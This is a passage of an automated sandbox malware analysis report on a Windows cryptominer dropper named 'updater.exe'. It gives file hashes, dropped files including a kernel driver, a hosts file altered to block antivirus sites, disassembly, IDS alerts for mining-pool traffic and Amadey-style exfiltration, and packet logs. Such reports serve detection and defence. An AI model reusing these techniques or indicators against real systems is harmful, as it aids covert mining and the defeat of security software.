                                              • 162.19.58.157
                                              https://34274421.webku.buzz/Get hashmaliciousUnknownBrowse
                                              • 162.19.58.159
                                              https://shadow-rapid-sunday.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                              • 162.19.58.159
                                              Suav289vuI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 67.238.37.116
                                              faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 72.166.124.103
                                              U6YcZ2TLtT.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 63.149.53.202

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Windows\Temp\maoxoafwbtki.sysSecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                                xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                                  gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                                    3YHDfHLvo4.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      conhost.exeGet hashmaliciousXmrigBrowse
                                                        Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                                                          SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                            SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                                              Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                updater.exeGet hashmaliciousXmrigBrowse

                                                                  Created / dropped Files

                                                                  C:\ProgramData\Google\Chrome\updater.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\updater.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5285888
                                                                  Entropy (8bit):6.5439853687656875
                                                                  Encrypted:false
                                                                  SSDEEP:98304:PESNReLHfx5vk7bqVTrvjNaJrXWTLLE3Lu+h3mo8i5BXdzLnKwUaQJ7:MQUTfxSe5FTLL2Vhd5jzLnKtaS7
                                                                  MD5:D82677AC9971E38439A6F8069E8BA5BF
                                                                  SHA1:534B60E16989751C4E2252BBBCC38D97B979F2D0
                                                                  SHA-256:F981FF1EC7014262015FA7FF9CC01097E98ECEC7385E0828B7D91DDE5B38CE03
                                                                  SHA-512:2740AABC53D2E00B72B77F6F20A327CDAA53CA76912ED54A17B0B0FD94802AC90E7CF82210F1CFF84A42897153538CE7F37E6A02D50DB7C427C0295B0D8F3E0A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d..."j.e.........."...........O.....@..........@............................. Q...........`..................................................H..<.............P...............Q.x............................ ..(....$..8...........@J..x............................text............................... ..`.rdata..p0... ...2..................@..@.data...H|O..`...^O..B..............@....pdata........P.......P.............@..@.00cfg........P.......P.............@..@.tls..........Q.......P.............@....reloc..x.....Q.......P.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllul3nqth:NllUa
                                                                  MD5:851531B4FD612B0BC7891B3F401A478F
                                                                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                  Malicious:false
                                                                  Preview:@...e.................................&..............@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bosnzhv.fsu.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hi00hr1n.lvt.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jodddkj1.w0x.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlcjo51f.juz.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1510207563435464
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                  MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                  SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                  SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                  SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                  Malicious:false
                                                                  Preview:@...e.................................:..............@..........

                                                                  C:\Windows\System32\drivers\etc\hosts

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\updater.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2748
                                                                  Entropy (8bit):4.269302338623222
                                                                  Encrypted:false
                                                                  SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                  MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                  SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                  SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                  SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                  Malicious:true
                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_c2tvagps.hao.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_gb3hbzal.jkv.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_nb50sti0.00l.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_uv4r1eml.uul.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Windows\Temp\maoxoafwbtki.sys

                                                                  Download File
                                                                  Process:C:\ProgramData\Google\Chrome\updater.exe
                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14544
                                                                  Entropy (8bit):6.2660301556221185
                                                                  Encrypted:false
                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  Joe Sandbox View:
                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.6320.5781.exe, Detection: malicious, Browse
                                                                  • Filename: xjSglbp263.exe, Detection: malicious, Browse
                                                                  • Filename: gwRQinPOHB.exe, Detection: malicious, Browse
                                                                  • Filename: 3YHDfHLvo4.exe, Detection: malicious, Browse
                                                                  • Filename: conhost.exe, Detection: malicious, Browse
                                                                  • Filename: Software1.30.1.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, Detection: malicious, Browse
                                                                  • Filename: Loader.exe, Detection: malicious, Browse
                                                                  • Filename: updater.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.5439853687656875
                                                                  TrID:
                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:updater.exe
                                                                  File size:5'285'888 bytes
                                                                  MD5:d82677ac9971e38439a6f8069e8ba5bf
                                                                  SHA1:534b60e16989751c4e2252bbbcc38d97b979f2d0
                                                                  SHA256:f981ff1ec7014262015fa7ff9cc01097e98ecec7385e0828b7d91dde5b38ce03
                                                                  SHA512:2740aabc53d2e00b72b77f6f20a327cdaa53ca76912ed54a17b0b0fd94802ac90e7cf82210f1cff84a42897153538ce7f37e6a02d50db7c427c0295b0d8f3e0a
                                                                  SSDEEP:98304:PESNReLHfx5vk7bqVTrvjNaJrXWTLLE3Lu+h3mo8i5BXdzLnKwUaQJ7:MQUTfxSe5FTLL2Vhd5jzLnKtaS7
                                                                  TLSH:E936232E2D0FA0EAC504447DC22B33A044EEBD5E579589DBDA75BEB06D150C4EC72F8A
                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d..."j.e.........."...........O.....@..........@............................. Q...........`........................................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x140001140
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x140000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x65A66A22 [Tue Jan 16 11:36:02 2024 UTC]
                                                                  TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b237ac2118704db9e7609540658f5790

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  dec eax
                                                                  mov eax, dword ptr [00010ED5h]
                                                                  mov dword ptr [eax], 00000001h
                                                                  call 00007F59611B72AFh
                                                                  nop
                                                                  nop
                                                                  nop
                                                                  dec eax
                                                                  add esp, 28h
                                                                  ret
                                                                  nop
                                                                  inc ecx
                                                                  push edi
                                                                  inc ecx
                                                                  push esi
                                                                  push esi
                                                                  push edi
                                                                  push ebx
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec eax
                                                                  mov eax, dword ptr [00000030h]
                                                                  dec eax
                                                                  mov edi, dword ptr [eax+08h]
                                                                  dec eax
                                                                  mov esi, dword ptr [00010EC9h]
                                                                  xor eax, eax
                                                                  dec eax
                                                                  cmpxchg dword ptr [esi], edi
                                                                  sete bl
                                                                  je 00007F59611B72D0h
                                                                  dec eax
                                                                  cmp edi, eax
                                                                  je 00007F59611B72CBh
                                                                  dec esp
                                                                  mov esi, dword ptr [000139F9h]
                                                                  nop word ptr [eax+eax+00000000h]
                                                                  mov ecx, 000003E8h
                                                                  inc ecx
                                                                  call esi
                                                                  xor eax, eax
                                                                  dec eax
                                                                  cmpxchg dword ptr [esi], edi
                                                                  sete bl
                                                                  je 00007F59611B72A7h
                                                                  dec eax
                                                                  cmp edi, eax
                                                                  jne 00007F59611B7289h
                                                                  dec eax
                                                                  mov edi, dword ptr [00010E90h]
                                                                  mov eax, dword ptr [edi]
                                                                  cmp eax, 01h
                                                                  jne 00007F59611B72AEh
                                                                  mov ecx, 0000001Fh
                                                                  call 00007F59611C79A4h
                                                                  jmp 00007F59611B72C9h
                                                                  cmp dword ptr [edi], 00000000h
                                                                  je 00007F59611B72ABh
                                                                  mov byte ptr [0050AA81h], 00000001h
                                                                  jmp 00007F59611B72BBh
                                                                  mov dword ptr [edi], 00000001h
                                                                  dec eax
                                                                  mov ecx, dword ptr [00010E7Ah]
                                                                  dec eax
                                                                  mov edx, dword ptr [00010E7Bh]
                                                                  call 00007F59611C799Bh
                                                                  mov eax, dword ptr [edi]
                                                                  cmp eax, 01h
                                                                  jne 00007F59611B72BBh
                                                                  dec eax
                                                                  mov ecx, dword ptr [00010E50h]

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x148880x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50e0000x18c.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5110000x78.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x120a00x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x124100x138.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x14a400x178.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x10a960x10c0025a5b203b78f66cc2202dffba4bb867aFalse0.45727903451492535data6.23628059943859IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x120000x30700x3200c05522f7e10a55cd6bc4c8e5280eb201False0.485data5.1256139374089225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x160000x4f7c480x4f5e0082428ae34bef76b7af4afc7e51e1bc99unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata0x50e0000x18c0x200eab168eb18c87146d1d80800968dd600False0.517578125data3.496130895590373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .00cfg0x50f0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .tls0x5100000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .reloc0x5110000x780x20001f8c7abb07b7dfe015437cf470c5706False0.232421875data1.4735891426027823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Imports

                                                                  DLLImport
                                                                  msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                                  KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                  2024-07-22T15:45:08.333951+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage49724443192.168.2.5141.94.96.195
                                                                  2024-07-22T15:46:06.697997+0200UDP2047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)6097153192.168.2.51.1.1.1
                                                                  2024-07-22T15:46:06.696381+0200TCP2054247ET MALWARE SilentCryptoMiner Agent Config Inbound804972377.222.57.251192.168.2.5
                                                                  2024-07-22T15:45:05.821446+0200UDP2040353ET COINMINER Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com)5294353192.168.2.51.1.1.1
                                                                  2024-07-22T15:45:11.088905+0200TCP2044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M34970880192.168.2.577.222.57.251
                                                                  2024-07-22T15:46:06.695665+0200TCP2044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M34972380192.168.2.577.222.57.251

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2024 15:45:05.835463047 CEST4970412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:05.841598034 CEST1222249704162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:05.841672897 CEST4970412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:05.841917992 CEST4970412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:05.847151995 CEST1222249704162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:06.997632027 CEST4970580192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:07.005851030 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.005924940 CEST4970580192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:07.006606102 CEST4970580192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:07.039699078 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.694612980 CEST1222249704162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:07.695899010 CEST4970412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:07.820501089 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.821124077 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.821132898 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.821247101 CEST4970580192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:07.821357965 CEST4970580192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:07.826114893 CEST804970577.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:07.831082106 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:07.831120968 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:07.831182003 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:07.850640059 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:07.850661039 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.329050064 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.330323935 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:08.330349922 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.331739902 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.331834078 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:08.333734035 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:08.333803892 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.333862066 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:08.333869934 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:08.379846096 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.062365055 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.062448978 CEST44349706104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.062565088 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.067451000 CEST49706443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.067467928 CEST44349706104.20.4.235192.168.2.5
